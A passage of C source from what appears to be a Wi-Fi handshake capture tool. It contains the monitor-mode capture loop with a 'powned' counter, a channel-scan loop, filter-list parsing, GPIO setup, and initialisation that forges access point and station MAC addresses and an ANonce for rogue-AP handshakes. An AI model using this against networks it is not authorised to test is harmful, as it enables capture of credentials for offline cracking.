lastsequencereassociationresponse = 0; memset(&lastaddr1data, 0, 6); memset(&lastaddr2data, 0, 6); lastsequencedata = 0; sa = 1; if(gpsdflag == true) { if(activate_gpsd() == false) { gpsdflag = false; } else { if((gpsdptr = strstr(gpsddata, gpsd_time)) != NULL) { sscanf(gpsdptr +8, "%d-%d-%dT%d:%d:%d;", &year, &month, &day, &hour, &minute, &second); } if((gpsdptr = strstr(gpsddata, gpsd_lat)) != NULL) { sscanf(gpsdptr +6, "%Lf", &lat); } if((gpsdptr = strstr(gpsddata, gpsd_lon)) != NULL) { sscanf(gpsdptr +6, "%Lf", &lon); } if((gpsdptr = strstr(gpsddata, gpsd_alt)) != NULL) { sscanf(gpsdptr +6, "%Lf", &alt); } printf("\e[?25l\nstart capturing (stop with ctrl+c)\n" "GPS LATITUDE.............: %Lf\n" "GPS LONGITUDE............: %Lf\n" "GPS ALTITUDE.............: %Lf\n" "GPS DATE.................: %02d.%02d.%04d\n" "GPS TIME.................: %02d:%02d:%02d\n" "INTERFACE................: %s\n" "ERRORMAX.................: %d errors\n" "FILTERLIST...............: %d entries\n" "MAC CLIENT...............: %06x%06x\n" "MAC ACCESS POINT.........: %06x%06x (incremented on every new ESSID)\n" "EAPOL TIMEOUT............: %d\n" "REPLAYCOUNT..............: %llu\n" "ANONCE...................: ", lat, lon, alt, day, month, year, hour, minute, second, interfacename, maxerrorcount, filterlist_len, myouista, mynicsta, myouiap, mynicap, eapoltimeout, rcrandom); for(c = 0; c < 32; c++) { printf("%02x", anoncerandom[c]); } printf("\n\n"); sa = 2; } } if(gpsdflag == false) { printf("\e[?25l\nstart capturing (stop with ctrl+c)\n" "INTERFACE................: %s\n" "ERRORMAX.................: %d errors\n" "FILTERLIST...............: %d entries\n" "MAC CLIENT...............: %06x%06x\n" "MAC ACCESS POINT.........: %06x%06x (incremented on every new client)\n" "EAPOL TIMEOUT............: %d\n" "REPLAYCOUNT..............: %llu\n" "ANONCE...................: ", interfacename, maxerrorcount, filterlist_len, myouista, mynicsta, myouiap, mynicap, eapoltimeout, rcrandom); for(c = 0; c < 32; c++) { 
printf("%02x", anoncerandom[c]); } printf("\n\n"); } gettimeofday(&tv, NULL); timestamp = ((uint64_t)tv.tv_sec * 1000000) + tv.tv_usec; timestampstart = timestamp; tvfd.tv_sec = 1; tvfd.tv_usec = 0; statuscount = 1; oldincommingcount1 = 0; oldincommingcount5 = 0; if(set_channel() == false) { fprintf(stderr, "failed to set channel\n"); globalclose(); } if(activescanflag == false) { send_broadcastbeacon(); send_undirected_proberequest(); } while(1) { if(gpiobutton > 0) { if(GET_GPIO(gpiobutton) > 0) { globalclose(); } } if(wantstopflag == true) { globalclose(); } if(errorcount >= maxerrorcount) { fprintf(stderr, "\nmaximum number of errors is reached\n"); globalclose(); } FD_ZERO(&readfds); FD_SET(fd_socket, &readfds); FD_SET(fd_socket_gpsd, &readfds); fdnum = select(fd_socket +sa, &readfds, NULL, NULL, &tvfd); if(fdnum < 0) { errorcount++; continue; } else if(FD_ISSET(fd_socket_gpsd, &readfds)) { gpsd_len = read(fd_socket_gpsd, gpsddata, GPSDDATA_MAX); if(gpsd_len < 0) { perror("\nfailed to read GPS data"); errorcount++; continue; } if(gpsd_len >= 0) { gpsddata[gpsd_len] = 0; #ifdef DEBUG fprintf(stdout, "\nGPS: %s\n", gpsddata); #endif } continue; } else if(FD_ISSET(fd_socket, &readfds)) { packet_len = read(fd_socket, epb +EPB_SIZE, PCAPNG_MAXSNAPLEN); if(packet_len == 0) { fprintf(stderr, "\ninterface went down\n"); globalclose(); } if(packet_len < 0) { perror("\nfailed to read packet"); errorcount++; continue; } #ifdef DEBUG debugprint(packet_len, &epb[EPB_SIZE]); #endif if(packet_len < (int)RTH_SIZE) { fprintf(stderr, "\ngot damged radiotap header\n"); errorcount++; continue; } if(ioctl(fd_socket, SIOCGSTAMP, &tv) < 0) { perror("\nfailed to get time"); errorcount++; continue; } timestamp = ((uint64_t)tv.tv_sec * 1000000) + tv.tv_usec; } else { if((statuscount %5) == 0) { if(gpiostatusled > 0) { GPIO_SET = 1 << gpiostatusled; if(incommingcount != oldincommingcount5) { usleep(GPIO_DELAY); GPIO_CLR = 1 << gpiostatusled; } oldincommingcount5 = incommingcount; } 
if(gpsdflag == false) { printf("\33[2K\rINFO: cha=%d, rx=%llu, rx(dropped)=%llu, tx=%llu, powned=%llu, err=%d", channelscanlist[cpa], incommingcount, droppedcount, outgoingcount, pownedcount, errorcount); } else { if((gpsdptr = strstr(gpsddata, gpsd_time)) != NULL) { sscanf(gpsdptr +8, "%d-%d-%dT%d:%d:%d;", &year, &month, &day, &hour, &minute, &second); } if((gpsdptr = strstr(gpsddata, gpsd_lat)) != NULL) { sscanf(gpsdptr +6, "%Lf", &lat); } if((gpsdptr = strstr(gpsddata, gpsd_lon)) != NULL) { sscanf(gpsdptr +6, "%Lf", &lon); } if((gpsdptr = strstr(gpsddata, gpsd_alt)) != NULL) { sscanf(gpsdptr +6, "%Lf", &alt); } printf("\33[2K\rINFO: cha=%d, rx=%llu, rx(dropped)=%llu, tx=%llu, powned=%llu, err=%d, lat=%Lf, lon=%Lf, alt=%Lf, gpsdate=%02d.%02d.%04d, gpstime=%02d:%02d:%02d", channelscanlist[cpa], incommingcount, droppedcount, outgoingcount, pownedcount, errorcount, lat, lon, alt, day, month, year, hour, minute, second); } } if(((statuscount %staytime) == 0) || ((staytimeflag != true) && (incommingcount == oldincommingcount1))) { cpa++; if(channelscanlist[cpa] == 0) { cpa = 0; } if(set_channel() == true) { if(activescanflag == false) { send_broadcastbeacon(); send_undirected_proberequest(); } } else { printf("\nfailed to set channel\n"); globalclose(); } } oldincommingcount1 = incommingcount; tvfd.tv_sec = 1; tvfd.tv_usec = 0; statuscount++; continue; } packet_ptr = &epb[EPB_SIZE]; rth = (rth_t*)packet_ptr; ieee82011_ptr = packet_ptr +le16toh(rth->it_len); ieee82011_len = packet_len -le16toh(rth->it_len); if(rth->it_present == 0) { continue; } if((rth->it_present & 0x20) != 0) { incommingcount++; } if(packet_len < (int)RTH_SIZE +(int)MAC_SIZE_NORM) { droppedcount++; continue; } macfrx = (mac_t*)ieee82011_ptr; if((macfrx->from_ds == 1) && (macfrx->to_ds == 1)) { payload_ptr = ieee82011_ptr +MAC_SIZE_LONG; payload_len = ieee82011_len -MAC_SIZE_LONG; } else { payload_ptr = ieee82011_ptr +MAC_SIZE_NORM; payload_len = ieee82011_len -MAC_SIZE_NORM; } if(macfrx->type == 
IEEE80211_FTYPE_MGMT) { if((rth->it_present & 0x20) == 0) { continue; } if(memcmp(macfrx->addr2, &mac_broadcast, 6) == 0) { droppedcount++; continue; } if(macfrx->subtype == IEEE80211_STYPE_BEACON) { if(filtermode == 3) { if(checkfilterlistentry(macfrx->addr2) == false) { continue; } } process80211beacon(); continue; } if(macfrx->subtype == IEEE80211_STYPE_PROBE_REQ) { if((macfrx->sequence == lastsequenceproberequest) && (memcmp(macfrx->addr1, &lastaddr1proberequest, 6) == 0) && (memcmp(macfrx->addr2, &lastaddr2proberequest, 6) == 0)) { droppedcount++; continue; } lastsequenceproberequest = macfrx->sequence; memcpy(&lastaddr1proberequest, macfrx->addr1, 6); memcpy(&lastaddr2proberequest, macfrx->addr2, 6); if(filtermode == 3) { if((checkfilterlistentry(macfrx->addr1) == false) && (checkfilterlistentry(macfrx->addr2) == false)) { continue; } } if(memcmp(macfrx->addr1, &mac_broadcast, 6) == 0) { process80211probe_req(); } else if(memcmp(macfrx->addr1, &mac_null, 6) == 0) { process80211probe_req(); } else { process80211directed_probe_req(); } continue; } if(macfrx->subtype == IEEE80211_STYPE_PROBE_RESP) { if((macfrx->sequence == lastsequenceproberesponse) && (memcmp(macfrx->addr1, &lastaddr1proberesponse, 6) == 0) && (memcmp(macfrx->addr2, &lastaddr2proberesponse, 6) == 0)) { droppedcount++; continue; } lastsequenceproberesponse = macfrx->sequence; memcpy(&lastaddr1proberesponse, macfrx->addr1, 6); memcpy(&lastaddr2proberesponse, macfrx->addr2, 6); if(filtermode == 3) { if((checkfilterlistentry(macfrx->addr1) == false) && (checkfilterlistentry(macfrx->addr2) == false)) { continue; } } process80211probe_resp(); continue; } if(macfrx->subtype == IEEE80211_STYPE_AUTH) { if((macfrx->sequence == lastsequenceauthentication) && (memcmp(macfrx->addr1, &lastaddr1authentication, 6) == 0) && (memcmp(macfrx->addr2, &lastaddr2authentication, 6) == 0)) { droppedcount++; continue; } lastsequenceauthentication = macfrx->sequence; memcpy(&lastaddr1authentication, macfrx->addr1, 6); 
memcpy(&lastaddr2authentication, macfrx->addr2, 6); if(filtermode == 3) { if((checkfilterlistentry(macfrx->addr1) == false) && (checkfilterlistentry(macfrx->addr2) == false)) { continue; } } process80211authentication(); continue; } if(macfrx->subtype == IEEE80211_STYPE_ASSOC_REQ) { if((macfrx->sequence == lastsequenceassociationrequest) && (memcmp(macfrx->addr1, &lastaddr1associationrequest, 6) == 0) && (memcmp(macfrx->addr2, &lastaddr2associationrequest, 6) == 0)) { droppedcount++; continue; } lastsequenceassociationrequest = macfrx->sequence; memcpy(&lastaddr1associationrequest, macfrx->addr1, 6); memcpy(&lastaddr2associationrequest, macfrx->addr2, 6); if(filtermode == 3) { if((checkfilterlistentry(macfrx->addr1) == false) && (checkfilterlistentry(macfrx->addr2) == false)) { continue; } } process80211association_req(); continue; } if(macfrx->subtype == IEEE80211_STYPE_ASSOC_RESP) { if((macfrx->sequence == lastsequenceassociationresponse) && (memcmp(macfrx->addr1, &lastaddr1associationresponse, 6) == 0) && (memcmp(macfrx->addr2, &lastaddr2associationresponse, 6) == 0)) { droppedcount++; continue; } lastsequenceassociationresponse = macfrx->sequence; memcpy(&lastaddr1associationresponse, macfrx->addr1, 6); memcpy(&lastaddr2associationresponse, macfrx->addr2, 6); if(filtermode == 3) { if((checkfilterlistentry(macfrx->addr1) == false) && (checkfilterlistentry(macfrx->addr2) == false)) { continue; } } process80211association_resp(); continue; } if(macfrx->subtype == IEEE80211_STYPE_REASSOC_REQ) { if((macfrx->sequence == lastsequencereassociationrequest) && (memcmp(macfrx->addr1, &lastaddr1reassociationrequest, 6) == 0) && (memcmp(macfrx->addr2, &lastaddr2reassociationrequest, 6) == 0)) { droppedcount++; continue; } lastsequencereassociationrequest = macfrx->sequence; memcpy(&lastaddr1reassociationrequest, macfrx->addr1, 6); memcpy(&lastaddr2reassociationrequest, macfrx->addr2, 6); if(filtermode == 3) { if((checkfilterlistentry(macfrx->addr1) == false) && 
(checkfilterlistentry(macfrx->addr2) == false)) { continue; } } process80211reassociation_req(); continue; } if(macfrx->subtype == IEEE80211_STYPE_REASSOC_RESP) { if((macfrx->sequence == lastsequencereassociationresponse) && (memcmp(macfrx->addr1, &lastaddr1reassociationresponse, 6) == 0) && (memcmp(macfrx->addr2, &lastaddr2reassociationresponse, 6) == 0)) { droppedcount++; continue; } lastsequencereassociationresponse = macfrx->sequence; memcpy(&lastaddr1reassociationresponse, macfrx->addr1, 6); memcpy(&lastaddr2reassociationresponse, macfrx->addr2, 6); if(filtermode == 3) { if((checkfilterlistentry(macfrx->addr1) == false) && (checkfilterlistentry(macfrx->addr2) == false)) { continue; } } process80211reassociation_resp(); continue; } droppedcount++; continue; } if(macfrx->type == IEEE80211_FTYPE_CTL) { droppedcount++; continue; } if(macfrx->type == IEEE80211_FTYPE_DATA) { if((macfrx->sequence == lastsequencedata) && (memcmp(macfrx->addr1, &lastaddr1data, 6) == 0) && (memcmp(macfrx->addr2, &lastaddr2data, 6) == 0)) { droppedcount++; continue; } lastsequencedata = macfrx->sequence; memcpy(&lastaddr1data, macfrx->addr1, 6); memcpy(&lastaddr2data, macfrx->addr2, 6); if((macfrx->subtype & IEEE80211_STYPE_QOS_DATA) == IEEE80211_STYPE_QOS_DATA) { payload_ptr += QOS_SIZE; payload_len -= QOS_SIZE; } if( macfrx->subtype == IEEE80211_STYPE_NULLFUNC) { continue; } if(payload_len < (int)LLC_SIZE) { continue; } llc_ptr = payload_ptr; llc = (llc_t*)llc_ptr; if(filtermode == 3) { if((checkfilterlistentry(macfrx->addr1) == false) && (checkfilterlistentry(macfrx->addr2) == false)) { continue; } } if(((ntohs(llc->type)) == LLC_TYPE_AUTH) && (llc->dsap == LLC_SNAP) && (llc->ssap == LLC_SNAP)) { process80211eap(); continue; } if(((ntohs(llc->type)) == LLC_TYPE_IPV4) && (llc->dsap == LLC_SNAP) && (llc->ssap == LLC_SNAP)) { if(fd_ippcapng != 0) { writeepb(fd_ippcapng); } continue; } if(((ntohs(llc->type)) == LLC_TYPE_IPV6) && (llc->dsap == LLC_SNAP) && (llc->ssap == LLC_SNAP)) { 
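if(fd_ippcapng != 0)
	{
	writeepb(fd_ippcapng);
	}
continue;
}
if(macfrx->protected ==1)
	{
	if(fd_weppcapng != 0)
		{
		mpdu_ptr = payload_ptr;
		mpdu = (mpdu_t*)mpdu_ptr;
		if(((mpdu->keyid >> 5) &1) == 0)
			{
			writeepb(fd_weppcapng);
			}
		}
	continue;
	}
droppedcount++;
}
}
return;
}
/*===========================================================================*/
/*
 * Radio channel assignment (rca) scan loop: hop through channelscanlist,
 * transmit one undirected probe request per channel and hand every received
 * beacon / probe response to process80211rcascanbeacon() resp.
 * process80211rcascanproberesponse().  When fd_rcascanpcapng is open every
 * accepted frame is additionally written there unfiltered.
 *
 * The loop only leaves through globalclose() (stop flag, GPIO button, error
 * budget, interface gone, channel set failure), so the trailing return is not
 * reached in practice.
 *
 * Globals used: tv, timestamp, timestampstart, fd_socket, epb, packet_len,
 * packet_ptr, ieee82011_ptr, ieee82011_len, macfrx, payload_ptr, payload_len,
 * cpa, channelscanlist, errorcount, maxerrorcount, incommingcount,
 * wantstopflag, gpiobutton, gpiostatusled.
 */
static inline void processrcascan()
{
static int fdnum;
static int rthlen;
static long long int statuscount;
static rth_t *rth;
static fd_set readfds;
static struct timeval tvfd;

gettimeofday(&tv, NULL);
timestamp = ((uint64_t)tv.tv_sec * 1000000) + tv.tv_usec;
timestampstart = timestamp;
tvfd.tv_sec = 1;
tvfd.tv_usec = 0;
statuscount = 1;
if(set_channel() == false)
	{
	fprintf(stderr, "\nfailed to set channel\n");
	globalclose();
	}
send_undirected_proberequest();
while(1)
	{
	/* termination conditions: GPIO button pressed, SIGINT flag, error budget */
	if((gpiobutton > 0) && (GET_GPIO(gpiobutton) > 0))
		{
		globalclose();
		}
	if(wantstopflag == true)
		{
		globalclose();
		}
	if(errorcount >= maxerrorcount)
		{
		fprintf(stderr, "\nmaximum number of errors is reached\n");
		globalclose();
		}
	FD_ZERO(&readfds);
	FD_SET(fd_socket, &readfds);
	/* tvfd is only re-armed in the timeout branch; on Linux select()
	 * decrements it, so the status tick below fires roughly once per
	 * second of wall time no matter how many frames arrive in between */
	fdnum = select(fd_socket +1, &readfds, NULL, NULL, &tvfd);
	if(fdnum < 0)
		{
		errorcount++;
		continue;
		}
	if((fdnum == 0) || (FD_ISSET(fd_socket, &readfds) == 0))
		{
		/* status tick: blink the LED every 5th tick, print the AP table and
		 * hop to the next channel every 2nd tick */
		if(((statuscount %5) == 0) && (gpiostatusled > 0))
			{
			GPIO_SET = 1 << gpiostatusled;
			usleep(GPIO_DELAY);
			GPIO_CLR = 1 << gpiostatusled;
			}
		if((statuscount %2) == 0)
			{
			printapinfo();
			cpa++;
			if(channelscanlist[cpa] == 0)
				{
				cpa = 0;
				}
			if(set_channel() == true)
				{
				send_undirected_proberequest();
				}
			else
				{
				printf("\nfailed to set channel\n");
				globalclose();
				}
			}
		tvfd.tv_sec = 1;
		tvfd.tv_usec = 0;
		statuscount++;
		continue;
		}
	/* socket readable: pull one frame (radiotap header + 802.11 frame) */
	packet_len = read(fd_socket, epb +EPB_SIZE, PCAPNG_MAXSNAPLEN);
	if(packet_len == 0)
		{
		fprintf(stderr, "\ninterface went down\n");
		globalclose();
		}
	if(packet_len < 0)
		{
		perror("\nfailed to read packet");
		errorcount++;
		continue;
		}
	if(packet_len < (int)RTH_SIZE)
		{
		fprintf(stderr, "\ngot damged radiotap header\n");
		errorcount++;
		continue;
		}
	if(ioctl(fd_socket, SIOCGSTAMP, &tv) < 0)
		{
		perror("\nfailed to get time");
		errorcount++;
		continue;
		}
	timestamp = ((uint64_t)tv.tv_sec * 1000000) + tv.tv_usec;
	packet_ptr = &epb[EPB_SIZE];
	rth = (rth_t*)packet_ptr;
	rthlen = le16toh(rth->it_len);
	/* it_len is the driver-reported total radiotap header length; bound it
	 * by what was actually read so the 802.11 header cannot be placed past
	 * the end of the buffer and ieee82011_len cannot go negative */
	if((rthlen < (int)RTH_SIZE) || (packet_len < rthlen +(int)MAC_SIZE_NORM))
		{
		continue;
		}
	ieee82011_ptr = packet_ptr +rthlen;
	ieee82011_len = packet_len -rthlen;
	if(rth->it_present == 0)
		{
		continue;
		}
	/* bit 5 of it_present (dBm antenna signal in the radiotap spec) is
	 * required; presumably this skips locally injected frames the driver
	 * echoes back without rx-only fields -- TODO confirm */
	if((rth->it_present & 0x20) == 0)
		{
		continue;
		}
	incommingcount++;
	macfrx = (mac_t*)ieee82011_ptr;
	/* from_ds && to_ds means the 4-address header form */
	if((macfrx->from_ds == 1) && (macfrx->to_ds == 1))
		{
		payload_ptr = ieee82011_ptr +MAC_SIZE_LONG;
		payload_len = ieee82011_len -MAC_SIZE_LONG;
		}
	else
		{
		payload_ptr = ieee82011_ptr +MAC_SIZE_NORM;
		payload_len = ieee82011_len -MAC_SIZE_NORM;
		}
	if(macfrx->type == IEEE80211_FTYPE_MGMT)
		{
		if(macfrx->subtype == IEEE80211_STYPE_BEACON)
			{
			process80211rcascanbeacon();
			}
		else if(macfrx->subtype == IEEE80211_STYPE_PROBE_RESP)
			{
			process80211rcascanproberesponse();
			}
		}
	if(fd_rcascanpcapng != 0)
		{
		writeepb(fd_rcascanpcapng);
		}
	}
return;
}
/*===========================================================================*/
/*
 * Return true when userchannel is a member of the zero-terminated global
 * channeldefaultlist (the channels the tool is willing to tune to).
 * Channel 0 is never a member because 0 terminates the list.
 */
static bool ischannelindefaultlist(uint8_t userchannel)
{
static uint8_t cpd;

for(cpd = 0; channeldefaultlist[cpd] != 0; cpd++)
	{
	if(channeldefaultlist[cpd] == userchannel)
		{
		return true;
		}
	}
return false;
}
/*===========================================================================*/
/*
 * Parse the -c option ("1,6,11,...") into the global channelscanlist and
 * zero-terminate it.  Every entry must parse as a number in 1..255 and be a
 * member of channeldefaultlist; at most 127 entries are accepted.
 *
 * Returns true with cpa reset to 0 on success.  Returns false on a bad entry
 * or overflow, leaving channelscanlist/cpa partially filled (the caller in
 * main() exits in that case).
 *
 * optarglist is duplicated with strdupa() because strtok() modifies its
 * input; the caller's string is left untouched.
 */
static inline bool processuserscanlist(char *optarglist)
{
static char *ptr;
static char *endptr;
static long value;
static char *userscanlist;

userscanlist = strdupa(optarglist);
cpa = 0;
for(ptr = strtok(userscanlist, ","); ptr != NULL; ptr = strtok(NULL, ","))
	{
	/* strtol instead of atoi: a non-numeric or out-of-range entry is
	 * rejected here instead of being silently truncated to a wrong channel */
	value = strtol(ptr, &endptr, 10);
	if((endptr == ptr) || (value < 1) || (value > 0xff))
		{
		return false;
		}
	channelscanlist[cpa] = (uint8_t)value;
	if(ischannelindefaultlist(channelscanlist[cpa]) == false)
		{
		return false;
		}
	cpa++;
	if(cpa > 127)
		{
		return false;
		}
	}
channelscanlist[cpa] = 0;
cpa = 0;
return true;
}
/*===========================================================================*/
/*
 * Strip trailing newline characters from buffer in place: first every
 * trailing '\n', then every trailing '\r' (so "abc\r\n" -> "abc" but
 * "abc\n\r" -> "abc\n").  len is the current string length; the new length
 * is returned.  Safe for len == 0 (no pointer before the buffer is formed).
 */
static inline size_t chop(char *buffer, size_t len)
{
if(len == 0)
	{
	return 0;
	}
while((len > 0) && (buffer[len -1] == '\n'))
	{
	buffer[--len] = 0;
	}
while((len > 0) && (buffer[len -1] == '\r'))
	{
	buffer[--len] = 0;
	}
return len;
}
/*---------------------------------------------------------------------------*/
/*
 * Read one line of at most size-1 bytes from inputstream into buffer and
 * strip the line ending.  Returns the remaining length, or -1 at end of
 * file / read error.  A line longer than size-1 is delivered in pieces:
 * the remainder shows up as the next "line".
 */
static inline int fgetline(FILE *inputstream, size_t size, char *buffer)
{
static size_t len;
static char *buffptr;

if(feof(inputstream))
	{
	return -1;
	}
buffptr = fgets(buffer, size, inputstream);
if(buffptr == NULL)
	{
	return -1;
	}
len = chop(buffptr, strlen(buffptr));
return len;
}
/*===========================================================================*/
/*
 * Read a MAC filter list (one "112233445566 [comment]" per line; '#' lines
 * and lines shorter than 12 characters are skipped) into the array zeiger
 * points to, at most FILTERLIST_MAX entries.
 *
 * Returns the number of entries stored; 0 if zeiger is NULL, the file cannot
 * be opened or no line was valid (globalinit() treats 0 as fatal).  Lines
 * that do not start with 12 hex digits are reported on stderr with their
 * line number and skipped.
 *
 * NOTE: lines longer than FILTERLIST_LINE_LEN-1 come back from fgetline()
 * in pieces, so their tail is seen as a separate (normally rejected) line.
 */
static inline int readfilterlist(char *listname, maclist_t *zeiger)
{
static int len;
static int c;
static int entries;
static FILE *fh_filter;
static char linein[FILTERLIST_LINE_LEN];

if(zeiger == NULL)
	{
	return 0;
	}
if((fh_filter = fopen(listname, "r")) == NULL)
	{
	fprintf(stderr, "opening blacklist failed %s\n", listname);
	return 0;
	}
/* entries are written through the parameter, so the function works for any
 * caller-supplied array and not only for the global filterlist */
entries = 0;
for(c = 1; entries < FILTERLIST_MAX; c++)
	{
	if((len = fgetline(fh_filter, FILTERLIST_LINE_LEN, linein)) == -1)
		{
		break;
		}
	if((len < 12) || (linein[0] == '#'))
		{
		continue;
		}
	if(hex2bin(&linein[0], zeiger->addr, 6) == false)
		{
		fprintf(stderr, "reading blacklist line %d failed: %s\n", c, linein);
		continue;
		}
	zeiger++;
	entries++;
	}
fclose(fh_filter);
return entries;
}
/*===========================================================================*/
/*
 * Map the Raspberry Pi GPIO register block into this process.
 * gpioperi is the peripheral base offset found by getrpirev(); the mapping
 * starts at GPIO_BASE + gpioperi and covers BLOCK_SIZE bytes.  Needs
 * read/write access to /dev/mem (root).  The descriptor is closed right
 * after mmap() -- the mapping stays valid without it.  On success the global
 * gpio points at the registers and true is returned.
 */
static bool initgpio(int gpioperi)
{
static int fd_mem;

fd_mem = open("/dev/mem", O_RDWR|O_SYNC);
if(fd_mem < 0)
	{
	fprintf(stderr, "failed to get device memory\n");
	return false;
	}
gpio_map = mmap(NULL, BLOCK_SIZE, PROT_READ|PROT_WRITE, MAP_SHARED, fd_mem, GPIO_BASE +gpioperi);
close(fd_mem);
if(gpio_map == MAP_FAILED)
	{
	fprintf(stderr, "failed to map GPIO memory\n");
	return false;
	}
gpio = (volatile unsigned *)gpio_map;
return true;
}
/*===========================================================================*/
static int getrpirev()
{
static FILE *fh_rpi;
static int len;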
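static int rpi = 0;
static int rev = 0;
static int gpioperibase = 0;
static char *revptr = NULL;
static char *revstr = "Revision";
static char *hwstr = "Hardware";
static char *snstr = "Serial";
static char linein[128];

fh_rpi = fopen("/proc/cpuinfo", "r");
if(fh_rpi == NULL)
	{
	perror("failed to retrieve cpuinfo");
	return gpioperibase;
	}
while(1)
	{
	if((len = fgetline(fh_rpi, 128, linein)) == -1)
		{
		break;
		}
	if(len < 15)
		{
		continue;
		}
	if(memcmp(&linein, hwstr, 8) == 0)
		{
		rpi |= 1;
		continue;
		}
	if(memcmp(&linein, revstr, 8) == 0)
		{
		rpirevision = strtol(&linein[len -6], &revptr, 16);
		if((revptr - linein) == len)
			{
			rev = (rpirevision >> 4) &0xff;
			if(rev <= 3)
				{
				gpioperibase = GPIO_PERI_BASE_OLD;
				rpi |= 2;
				continue;
				}
			if(rev == 0x9)
				{
				gpioperibase = GPIO_PERI_BASE_OLD;
				rpi |= 2;
				continue;
				}
			if(rev == 0xc)
				{
				gpioperibase = GPIO_PERI_BASE_OLD;
				rpi |= 2;
				continue;
				}
			if((rev == 0x04) || (rev == 0x08) || (rev == 0x0d) || (rev == 0x00e))
				{
				gpioperibase = GPIO_PERI_BASE_NEW;
				rpi |= 2;
				continue;
				}
			continue;
			}
		rpirevision = strtol(&linein[len -4], &revptr, 16);
		if((revptr - linein) == len)
			{
			if((rpirevision < 0x02) || (rpirevision > 0x15))
				{
				continue;
				}
			if((rpirevision == 0x11) || (rpirevision == 0x14))
				{
				continue;
				}
			gpioperibase = GPIO_PERI_BASE_OLD;
			rpi |= 2;
			}
		continue;
		}
	if(memcmp(&linein, snstr, 6) == 0)
		{
		rpi |= 4;
		continue;
		}
	}
fclose(fh_rpi);
if(rpi < 0x7)
	{
	return 0;
	}
return gpioperibase;
}
/*===========================================================================*/
/*
 * One-time initialisation of the global state:
 *  - reset counters, GPS fields, sequence numbers and dump descriptors
 *  - seed rand() from the interface's permanent MAC plus the current time
 *    and derive the access point MAC (mac_myap / mac_mybcap) and station MAC
 *    (mac_mysta) unless --ap_mac / --station_mac supplied OUI and/or NIC
 *  - pick a random replay counter (rcrandom) and ANonce (anoncerandom)
 *  - allocate aplist, myaplist, pownedlist and, when a filter list was
 *    given, filterlist (a filter list with no valid entry is fatal)
 *  - open the pcapng dump files; in rcascan mode only the raw rcascan dump
 *    is opened and the other output names are discarded
 *  - install the SIGINT handler programmende and, when a GPIO button or
 *    status LED is configured, map the GPIO registers and blink the LED
 *    five times
 *
 * Returns false on any allocation, dump file or GPIO failure; resources
 * acquired up to that point are not released here (presumably globalclose()
 * takes care of that -- confirm).
 *
 * Note: rand() is a plain PRNG seeded from MAC + time, fine for choosing
 * identifiers but not a cryptographic source; "rand() % 0xff" also never
 * yields the byte value 0xff.
 */
static inline bool globalinit()
{
static int c;
static int myseek;
static int gpiobasemem = 0;

rpirevision = 0;
fd_pcapng = 0;
fd_ippcapng = 0;
fd_weppcapng = 0;
fd_rcascanpcapng = 0;
errorcount = 0;
incommingcount = 0;
droppedcount = 0;
outgoingcount = 0;
day = 0;
month = 0;
year = 0;
hour = 0;
minute = 0;
second = 0;
lat = 0;
lon = 0;
alt = 0;
mydisassociationsequence = 0;
mydeauthenticationsequence = 0;
mybeaconsequence = 0;
myproberequestsequence = 0;
myauthenticationrequestsequence = 0;
myauthenticationresponsesequence = 0;
myassociationrequestsequence = 0;
myassociationresponsesequence = 0;
myproberesponsesequence = 0;
myidrequestsequence = 0;
mytime = 0;

/* unbuffered stdout so the single-line status output appears immediately */
setbuf(stdout, NULL);
gettimeofday(&tv, NULL);
myseek = (mac_orig[3] << 16) + (mac_orig[4] << 8) + mac_orig[5] + tv.tv_sec + tv.tv_usec;
srand(myseek);
/* access point MAC: vendor OUI from myvendorap unless given, NIC part derived
 * from the interface's own NIC part plus mac_orig[2] random increments */
if(myouiap == 0)
	{
	myouiap = myvendorap[rand() %((MYVENDORAP_SIZE /sizeof(int)))];
	}
if(mynicap == 0)
	{
	mynicap = (mac_orig[3] << 16) + (mac_orig[4] << 8) + mac_orig[5];
	for(myseek = 0; myseek < mac_orig[2]; myseek++)
		{
		mynicap += rand() & 0xffffff;
		}
	}
/* 0xfcffff clears the multicast and locally-administered bits of the OUI */
myouiap &= 0xfcffff;
mynicap &= 0xffffff;
mac_mybcap[5] = mynicap & 0xff;
mac_mybcap[4] = (mynicap >> 8) & 0xff;
mac_mybcap[3] = (mynicap >> 16) & 0xff;
mac_mybcap[2] = myouiap & 0xff;
mac_mybcap[1] = (myouiap >> 8) & 0xff;
mac_mybcap[0] = (myouiap >> 16) & 0xff;
memcpy(&mac_myap, &mac_mybcap, 6);
/* station MAC: vendor OUI from myvendorsta unless given, random NIC part */
if(myouista == 0)
	{
	myouista = myvendorsta[rand() %((MYVENDORSTA_SIZE /sizeof(int)))];
	}
if(mynicsta == 0)
	{
	mynicsta = rand() & 0xffffff;
	}
myouista &= 0xffffff;
mynicsta &= 0xffffff;
mac_mysta[5] = mynicsta &0xff;
mac_mysta[4] = (mynicsta >> 8) &0xff;
mac_mysta[3] = (mynicsta >> 16) &0xff;
mac_mysta[2] = myouista & 0xff;
mac_mysta[1] = (myouista >> 8) &0xff;
mac_mysta[0] = (myouista >> 16) &0xff;
memset(&laststam1, 0, 6);
memset(&lastapm1, 0, 6);
lastrcm1 = 0;
lasttimestampm1 = 0;
memset(&laststam2, 0, 6);
memset(&lastapm2, 0, 6);
lastrcm2 = 0;
lasttimestampm2 = 0;
rcrandom = (rand()%0xfff) +0xf000;
for(c = 0; c < 32; c++)
	{
	anoncerandom[c] = rand() %0xff;
	}
if((aplist = calloc((APLIST_MAX), APLIST_SIZE)) == NULL)
	{
	return false;
	}
aplist_ptr = aplist;
aplistcount = 0;
if((myaplist = calloc((MYAPLIST_MAX), MYAPLIST_SIZE)) == NULL)
	{
	return false;
	}
myaplist_ptr = myaplist;
if((pownedlist = calloc((POWNEDLIST_MAX), MACMACLIST_SIZE)) == NULL)
	{
	return false;
	}
filterlist_len = 0;
filterlist = NULL;
if(filterlistname != NULL)
	{
	if((filterlist = calloc((FILTERLIST_MAX), MACLIST_SIZE)) == NULL)
		{
		return false;
		}
	filterlist_len = readfilterlist(filterlistname, filterlist);
	if(filterlist_len == 0)
		{
		return false;
		}
	}
if(rcascanflag == true)
	{
	/* rcascan mode writes nothing but the raw scan dump */
	pcapngoutname = NULL;
	ippcapngoutname = NULL;
	weppcapngoutname = NULL;
	if(rcascanpcapngname != NULL)
		{
		fd_rcascanpcapng = hcxcreatepcapngdump(rcascanpcapngname, mac_orig, interfacename, mac_mybcap, rcrandom, anoncerandom, mac_mysta);
		if(fd_rcascanpcapng <= 0)
			{
			fprintf(stderr, "could not create dumpfile %s\n", rcascanpcapngname);
			return false;
			}
		}
	}
if(pcapngoutname != NULL)
	{
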